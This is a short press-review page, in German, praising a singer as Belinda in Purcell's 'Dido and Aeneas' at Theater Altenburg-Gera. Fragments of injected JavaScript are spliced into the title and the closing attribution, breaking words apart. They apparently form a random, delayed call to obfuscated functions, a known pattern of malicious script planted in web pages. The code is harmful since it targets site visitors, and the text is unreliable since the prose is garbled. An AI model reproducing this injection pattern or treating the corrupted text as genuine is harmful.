dido

Henry Purcell, "Dido andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} Aeneas", Belinda; Theater Altenburg-Gera

"Die Besetzung folgt dem Ansinnen Purcells, der die weiblichen Solopartien für die jungen Damen einer vornehmen Schule komponierte: … und ihre Vertrauten (gesungen von Kathrin Puschendorf und Birgit Wesolek) mit jugendlich klaren Sopranen …"

Ostthüringer Zeitung

"… ein stimmiges barockes Kammerspiel …, in dem Gesang und Musik uneingeschränkt dominieren dürfen. Und da war Erstaunliches zu hören! Ein Ensemble hatte sich die Welt des frühbarocken Gesangs erobert, wusste mit Koloratur und Effekt umzugehen, … durch die Objektivität makelloser musikalisch-melodischer Abläufe …. Eine kaum vorstellbare Einheitlichkeit des Singens wurde erreicht, an der alle beteiligt waren: … Birgit Wesolek (Belinda) …"

Thüringer Landom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}